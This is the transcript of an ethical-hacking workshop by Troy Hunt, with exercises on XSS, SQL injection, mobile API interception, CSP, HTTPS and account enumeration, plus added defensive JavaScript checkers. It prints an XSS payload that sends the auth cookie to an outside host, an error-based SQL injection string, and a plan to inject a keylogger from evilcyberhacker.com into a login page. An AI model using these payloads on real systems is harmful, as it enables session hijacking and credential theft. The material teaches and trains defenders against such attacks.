
Learn Ethical Hacking with Troy Hunt - Hands-on Exercises
Presentation Transcript
Hack Yourself First
Troy Hunt: @troyhunt, troyhunt.com, troyhunt@hotmail.com
We're gonna turn you into lean, mean hacking machines!
Because if we don't, these kids are going to hack you:
- Jake Davies, 19 (and his mum)
- Ryan Cleary, 20 (and his mum)
- Curtis Gervais, 16, awaiting trial (probably with his mum)
Who are we protecting our assets from?
[Chart: hacker competency (bored kids, common thieves, super hackers) plotted against hacker resources (from pocket money up to $10.8B per annum, able to invest wherever the ROI makes sense)]
Your Hacker Tools for Today
- A Wi-Fi connection
- A mobile device you can configure a proxy on (I have a few spares)
- Google Chrome, or another browser with good dev tools
- Fiddler (getfiddler.com), or another HTTP proxy like charlesproxy.com
What we'll be covering on day 1
09:00  Introduction (30 mins)
09:30  Discovering risks via the browser (30 mins)
10:00  Using an HTTP proxy (30 mins)
10:30  Break (15 mins)
10:45  XSS (50 mins)
11:35  SQL injection part 1 (55 mins)
12:30  Lunch (1 hour)
13:30  Mobile APIs (60 mins)
14:30  Content Security Policy (50 mins)
15:20  Break (15 mins)
15:35  Account Enumeration (30 mins)
16:05  HTTPS (55 mins)
17:00  Close
Exercise 1 Discovering risks via the browser
Exercise 1: Chrome developer tools
- Familiarise yourself with the dev tools: Elements, Network, cookies, Console, por... uh, Incognito
- Create an account at hackyourselffirst.troyhunt.com
Hacker Challenge 1: Identify three security risks with the registration process
Exercise 2 Using an HTTP proxy
Exercise 2: Using an HTTP proxy
- Familiarise yourself with Fiddler: watch requests and their headers, review response bodies and headers, use the Composer to reissue a request
Hacker Challenge 2: Use Fiddler to vote multiple times on one car with your ID
Exercise 3 Reflected cross site scripting (XSS)
Understanding XSS
Server-side code: <p>You searched for <%= Request.QueryString["q"] %></p>
Request: mysite.com/?q=ferrari
Response: <p>You searched for ferrari</p>
Request: mysite.com/?q=<script>alert('Yay XSS!');</script>
Response: <p>You searched for <script>alert('Yay XSS!');</script></p>
The query string is written into the page without encoding, so whatever the attacker puts in the URL is parsed as markup and the script runs in the victim's browser.
Some quick XSS tips
- Check the encoding context: you encode for HTML differently than for a JavaScript string
- Check the encoding consistency: it is often done by hand, and some characters are not encoded
- Play with JavaScript to manipulate the DOM, access cookies and load external resources
Exercise 3: XSS
- Establish the encoding practices on the search page: what's encoded, what's not, and which contexts are encoded
- Work out what can be accessed or manipulated in the DOM
Hacker Challenge 3: Create an XSS attack that sends the auth cookie to another site
Exercise 3 solution
http://hackyourselffirst.troyhunt.com/Search?searchTerm=');document.location='http://www.troyhunt.com/?c='%2bdocument.cookie;//
The search term lands inside a JavaScript string on the results page: the leading ') closes the string literal and the call around it, the assignment to document.location sends the browser to the other site with document.cookie appended to the query string (%2b is a URL-encoded +), and the trailing // comments out the rest of the original statement so the script still parses.
Exercise 4 SQL injection (SQLi)
Understanding SQLi
Server-side code:
var query = "SELECT * FROM Widget WHERE Id = "
query += Request.Query["id"]
Request: mysite.com/?id=1
Query: SELECT * FROM Widget WHERE Id = 1
Request: mysite.com/?id=foo
Query: SELECT * FROM Widget WHERE Id = foo
Error: Invalid column name 'foo'
The parameter is concatenated into the statement unquoted, so the database parses it as SQL rather than as a value, and the error message confirms that to the attacker.
Some quick SQLi tips
- Think of SQL commands which disclose structure: sys.tables, sys.columns, system commands
- Consider how you'd enumerate through records: SELECT TOP x rows ascending, then TOP 1 from that result descending, to reach the xth row one query at a time
- Write out how you think the query works internally: SELECT * FROM Supercar ORDER BY [URL param]
Exercise 4: SQLi
- Explore the database using error-based SQLi
- Construct strings to disclose internal data
- Cast things to invalid types to disclose them via exceptions
Hacker Challenge 4: Discover the version of the DB
Exercise 4 solution
http://hackyourselffirst.troyhunt.com/Make/1?orderby=@@VERSION*1
@@VERSION is a string; multiplying it by 1 forces SQL Server to convert it to a number, the conversion fails, and the resulting error message quotes the value it could not convert, so the full version string comes back in the error page.
Exercise 5 Mobile APIs
Trusting the Fiddler root cert
Browse to http://ipv4.fiddler:8888 (Fiddler's own echo page) from the proxied device and install the FiddlerRoot certificate it links to; HTTPS traffic from the device can then be decrypted by the proxy.
Some quick mobile API tips
- Look at the HTTP requests for sensitive data: credentials, account info, PII
- Remove the proxy's root cert and make HTTPS requests: is cert validation actually enabled in the app? If the app keeps working through the proxy without the trusted root, it is not checking the certificate at all
- In your own apps: parameter tampering, auth bypass, direct object references
Exercise 5: Mobile APIs
- Proxy your device through Fiddler or Charles
- Inspect the traffic of your apps: perform normal activities and monitor the requests
Hacker Challenge 5: Find three things of interest (it doesn't have to be security related)
Exercise 6 FiddlerScript
Understanding FiddlerScript
- Highlight particular request / response patterns
- Modify requests or responses in transit
- A good representation of what can be done with intercepted traffic
- Also great for causing apps to misbehave!
Some quick FiddlerScript tips
- Make good use of the FiddlerScript CookBook (Google it, first result)
- Wrap conditions around response parsing for better performance: check host name, path, content type or method before touching the body
- Don't forget to hit the Save Script button! Plus debugging can be painful
Exercise 6: FiddlerScript
- Modify the traffic returned to your app
- Identify request / response patterns of an app
- Manipulate the request / response to cause misbehaviour
Hacker Challenge 6: Proxy your mobile device and cause one of your apps to do something interesting
Exercise 7 Content Security Policy (CSP)
Without a CSP
- Anything can be added to the page via a reflected XSS risk
- Anything can be added to the DOM downstream of the server (and you have no idea when this one is happening!)
With a CSP
- The browser will only load resources you whitelist: local resources, remote resources
- Any violations can be reported
- If you're nervous, you can always just report and not block
Some quick CSP tips
- Create a whitelist of what should be allowed to run
- Start with nothing and see what breaks (in development!)
- Use the report feature to track exceptions: you'll learn some interesting things
Exercise 7: CSP
- Falafel needs help! They have no CSP and they're a financial institution!
- We can add one ourselves in transit
Hacker Challenge 7: Write a CSP for a site and embed it using FiddlerScript
Injecting the CSP header
if (oSession.HostnameIs("www.americanexpress.com")) {
  oSession.oResponse.headers["Content-Security-Policy"] = ""; // your policy goes here
}
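The exercise 7 injection and the FiddlerScript tips (cheap conditions before parsing, report-only first), as an added example that is not the workshop's own script. It is written as plain JavaScript over a small session object so it runs under Node; in Fiddler the same logic goes in OnBeforeResponse(oSession) in CustomRules.js, where oSession.HostnameIs(), oSession.HTTPMethodIs("GET"), oSession.oResponse.headers and oSession.oResponse.headers.ExistsAndContains("Content-Type", "text/html") do what hostname, request.method and shouldInject() do here. The allow-listed CDN and the report collector are assumptions for the demonstration.

```javascript
// Added example: CSP injection in transit, modelled on a FiddlerScript
// OnBeforeResponse handler. Not the workshop's code.

const TARGET_HOST = "www.americanexpress.com";           // host from the slide
const REPORT_URI = "https://csp-report.example/collect"; // assumed collector

// Build a policy from an explicit allow list. Everything starts at 'none', as the
// CSP tips advise, and only the listed directives open anything up.
function buildCsp(allow, reportUri) {
  const directives = ["default-src 'none'"];
  for (const [directive, sources] of Object.entries(allow)) {
    directives.push(`${directive} ${sources.join(" ")}`);
  }
  if (reportUri) directives.push(`report-uri ${reportUri}`);
  return directives.join("; ");
}

// Cheap checks before doing anything with the response: right host, a GET, and
// an HTML document (no point stamping a policy on images or JSON).
function shouldInject(session) {
  if (session.hostname.toLowerCase() !== TARGET_HOST) return false;
  if (session.request.method !== "GET") return false;
  const ct = session.response.headers["Content-Type"] || "";
  return ct.toLowerCase().includes("text/html");
}

// Equivalent of the OnBeforeResponse handler: add the policy in transit.
// reportOnly=true uses the Report-Only header, so violations are reported to
// REPORT_URI but nothing is blocked; run with that first, then switch to enforcing.
function injectCsp(session, policy, reportOnly) {
  if (!shouldInject(session)) return false;
  const name = reportOnly
    ? "Content-Security-Policy-Report-Only"
    : "Content-Security-Policy";
  session.response.headers[name] = policy;
  return true;
}

// Constructed session objects standing in for Fiddler's oSession.
function makeSession(hostname, method, contentType) {
  return {
    hostname,
    request: { method },
    response: { headers: { "Content-Type": contentType } },
  };
}

const POLICY = buildCsp({
  "script-src": ["'self'", "https://cdn.example"], // assumed first-party CDN
  "style-src": ["'self'"],
  "img-src": ["'self'", "data:"],
  "connect-src": ["'self'"],
}, REPORT_URI);

const page = makeSession(TARGET_HOST, "GET", "text/html; charset=utf-8");
injectCsp(page, POLICY, true);
console.log(page.response.headers);
```

Because the policy is built from a list rather than typed into the header line, tightening or loosening it during the "see what breaks" phase is a one-line change, and the content-type guard keeps the handler off every image, script and API response the site serves.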
Exercise 8 HTTPS
Understanding HTTPS
- Confidentiality
- Integrity
- Authenticity
Some quick HTTPS tips
- Consider everything sent over HTTP to be compromised (sometimes that won't matter much)
- Also look at HTTPS content embedded in untrusted pages: iframes, links to HTTPS
Exercise 8: HTTPS
- You can't trust insecure login forms! A form delivered over HTTP can be manipulated in transit, even if it posts to HTTPS
- Manipulate it to capture the "secure" credentials in transit
Hacker Challenge 8: Inject a JavaScript keylogger into an insecure login page using FiddlerScript
Injecting the keylogger
- Script loaded from evilcyberhacker.com/keylogger.js
- Set the destination JavaScript variable
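The defensive counterpart to exercise 8, as an added example that is not part of the workshop: a check that flags the two conditions the exercise exploits, a login form that arrived over HTTP (so anything can be injected into it in transit) and a login form that posts to HTTP (so the password leaves in the clear even when the page itself was HTTPS). The sample pages are constructed for the demonstration; a real run would feed it the body of a response captured in the proxy.

```javascript
// Added example: find login forms that are served over, or post over, plain HTTP.
// Not part of the workshop material.

const RISK_PAGE_OVER_HTTP = "PAGE_OVER_HTTP";   // form arrived over a channel anyone can modify
const RISK_POSTS_OVER_HTTP = "POSTS_OVER_HTTP"; // credentials will leave over plaintext

// Returns a list of { code, detail } for every form on the page that takes a password.
function findLoginFormRisks(pageUrl, html) {
  const risks = [];
  const page = new URL(pageUrl);
  const formRe = /<form\b([^>]*)>([\s\S]*?)<\/form>/gi;
  let m;
  while ((m = formRe.exec(html)) !== null) {
    const [, attrs, body] = m;
    // Only forms with a password field count as login forms.
    if (!/<input\b[^>]*\btype\s*=\s*["']?password\b/i.test(body)) continue;
    const actionMatch = attrs.match(/\baction\s*=\s*["']?([^"'\s>]*)/i);
    // A missing or empty action posts back to the page URL, and relative
    // actions resolve against it, so the page's own scheme decides.
    const target = new URL(actionMatch ? actionMatch[1] : "", page);
    if (page.protocol !== "https:") {
      risks.push({ code: RISK_PAGE_OVER_HTTP,
                   detail: `login form served from ${page.href}` });
    }
    if (target.protocol !== "https:") {
      risks.push({ code: RISK_POSTS_OVER_HTTP,
                   detail: `login form posts to ${target.href}` });
    }
  }
  return risks;
}

// Convenience for reporting: just the risk codes, in order found.
function riskCodes(pageUrl, html) {
  return findLoginFormRisks(pageUrl, html).map((r) => r.code);
}

// Constructed sample pages.
// The exercise 8 case: HTTP page, HTTPS action. The credentials travel encrypted,
// but the page that collects them was delivered in a form anyone could rewrite.
const PAGE_HTTP_POST_HTTPS = `
<html><body>
<form action="https://shop.example/login" method="post">
  <input name="email"><input type="password" name="pwd"><button>Log in</button>
</form>
<form action="/search"><input name="q"></form>
</body></html>`;

// HTTPS page whose form posts to a legacy HTTP endpoint.
const PAGE_HTTPS_POST_HTTP = `
<form method="post" action="http://legacy.example/login">
  <input type='password' name='password'>
</form>`;

// Relative action: safe or not depending purely on how the page was fetched.
const PAGE_RELATIVE = `<form action="/login" method="post"><input type="password" name="p"></form>`;

console.log(riskCodes("http://shop.example/login", PAGE_HTTP_POST_HTTPS));
console.log(riskCodes("http://shop.example/login", PAGE_RELATIVE));
```

The first constructed page is the one the exercise targets: its action is HTTPS, so a quick glance at the form says "secure", yet the check still reports PAGE_OVER_HTTP because the page that carries the form is the thing being tampered with.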
Exercise 9 Account enumeration
Understanding account enumeration
Does john@gmail.com have an account? No
Does mary@gmail.com have an account? No
Does max@gmail.com have an account? Yes
Some quick account enumeration tips
- There are usually multiple vectors for identifying the existence of an account
- There may or may not be an anti-automation defence, and it may be inconsistent across vectors
- It may or may not even matter: that depends very much on the nature of the site
Exercise 9: Account enumeration
- Identify vectors for account enumeration: think about how to ask the site about an account
- Identify positive versus negative responses
Hacker Challenge 9: Identify 3 sites you use that disclose the presence of your account
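The "positive versus negative responses" step of exercise 9, as an added example that is not part of the workshop: ask the site the same question about an address you know is registered and one you know is not, for each vector (login, registration, password reset), and diff the answers on the signals that usually leak. The responses below are constructed for the demonstration; in practice they are captured with the proxy (the Fiddler Composer is enough for a handful of requests), and the timing threshold is an assumption.

```javascript
// Added example: compare a site's responses for an existing versus a
// non-existent account, per vector. Not part of the workshop material.

const TIMING_THRESHOLD_MS = 100; // assumed: above this, the delay is not noise

// Returns the signals on which the two responses differ; an empty list means
// this vector gives the same answer whether or not the account exists.
function compareResponses(existing, missing) {
  const signals = [];
  if (existing.status !== missing.status) signals.push("status");
  const loc = (r) => r.headers["Location"] || "";
  if (loc(existing) !== loc(missing)) signals.push("redirect");
  // Collapse whitespace so a reformatted page does not count as a difference.
  const norm = (r) => r.body.replace(/\s+/g, " ").trim();
  if (norm(existing) !== norm(missing)) signals.push("body");
  if (Math.abs(existing.timeMs - missing.timeMs) > TIMING_THRESHOLD_MS) signals.push("timing");
  return signals;
}

// vectors: { name: { existing, missing } }  ->  { name: [signals] }
function enumerationReport(vectors) {
  const report = {};
  for (const [name, pair] of Object.entries(vectors)) {
    report[name] = compareResponses(pair.existing, pair.missing);
  }
  return report;
}

// Names of the vectors that disclose whether the account exists.
function leakingVectors(report) {
  return Object.keys(report).filter((name) => report[name].length > 0);
}

const resp = (status, body, timeMs, headers = {}) => ({ status, body, timeMs, headers });

// Constructed captures for max@gmail.com (registered) and john@gmail.com (not).
const SAMPLE_VECTORS = {
  // Login: identical generic message, but the password hash is only computed
  // for a real account, so the response takes visibly longer.
  login: {
    existing: resp(200, "Invalid email or password.", 340),
    missing:  resp(200, "Invalid email or password.", 18),
  },
  // Registration: an explicit "already registered" error versus a redirect.
  register: {
    existing: resp(400, "That email address is already registered.", 42),
    missing:  resp(302, "", 39, { Location: "/check-your-email" }),
  },
  // Password reset: the same answer either way, with nothing to tell them apart.
  reset: {
    existing: resp(200, "If that address is registered, we have emailed a reset link.", 55),
    missing:  resp(200, "If that address is registered, we have emailed a reset link.", 51),
  },
};

console.log(enumerationReport(SAMPLE_VECTORS));
console.log("leaking via:", leakingVectors(enumerationReport(SAMPLE_VECTORS)));
```

The login vector is the one people miss: status, redirect and body are identical, and only the response time gives the account away, which is why the comparison keeps timing as a separate signal rather than stopping at the first byte-for-byte match.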